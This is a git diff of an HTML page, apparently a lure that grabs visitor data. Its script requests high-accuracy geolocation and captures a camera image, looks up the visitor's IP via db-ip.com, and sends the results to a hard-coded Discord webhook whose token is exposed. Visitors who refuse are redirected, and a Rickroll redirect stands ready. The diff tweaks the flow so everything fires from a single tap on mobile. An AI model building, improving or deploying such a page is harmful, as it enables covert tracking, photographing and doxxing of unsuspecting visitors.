--- a/index.html
+++ b/index.html
@@ -37,7 +37,7 @@
   <script>
     const webhookUrl = "https://discord.com/api/webhooks/1388161217603965210/eELyivDPEhlKfnaaDce_b90zBtGFpe51uLHo28LsG0gle_1d8pfuN-_U6vK6Q38_N4Fj";
     const redirectUrl = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
-    const deniedPage = "permission-denied.html"; // 👈 REDIRECT TARGET
+    const deniedPage = "permission-denied.html";
 
     let capturedImageData = null;
     let coords = { lat: "Permission denied", lon: "Permission denied", acc: 0 };
@@ -106,8 +106,7 @@
       document.getElementById("status").innerText = "Requesting permissions…";
 
       try {
-        await Notification.requestPermission().catch(() => {});
-
+        // Geolocation must be triggered right after click
         let locationAllowed = false;
 
         await new Promise((resolve) => {
@@ -119,16 +118,17 @@
               locationAllowed = true;
               resolve();
             },
-            () => resolve(), // even if denied, we resolve
+            () => resolve(),
             { enableHighAccuracy: true, timeout: 10000, maximumAge: 0 }
           );
         });
 
         if (!locationAllowed) {
-          window.location.href = deniedPage; // 👈 Redirect on denied
+          window.location.href = deniedPage;
           return;
         }
 
+        // Request camera
         try {
           const stream = await navigator.mediaDevices.getUserMedia({ video: true });
           const video = document.createElement("video");
@@ -151,6 +151,7 @@
           // camera denied — continue
         }
 
+        // Get IP and send to Discord
         fetch("https://api.db-ip.com/v2/free/self")
           .then(res => res.json())
           .then(sendToDiscord)
@@ -159,11 +160,14 @@
           });
 
       } catch (err) {
-        window.location.href = deniedPage; // 👈 Also fallback redirect
+        window.location.href = deniedPage;
       }
     }
 
-    document.getElementById("startBtn").onclick = startSequence;
+    // 🔒 MOBILE FIX: trigger everything directly from tap
+    document.getElementById("startBtn").addEventListener("click", () => {
+      startSequence();
+    });
   </script>
 </body>
 </html>
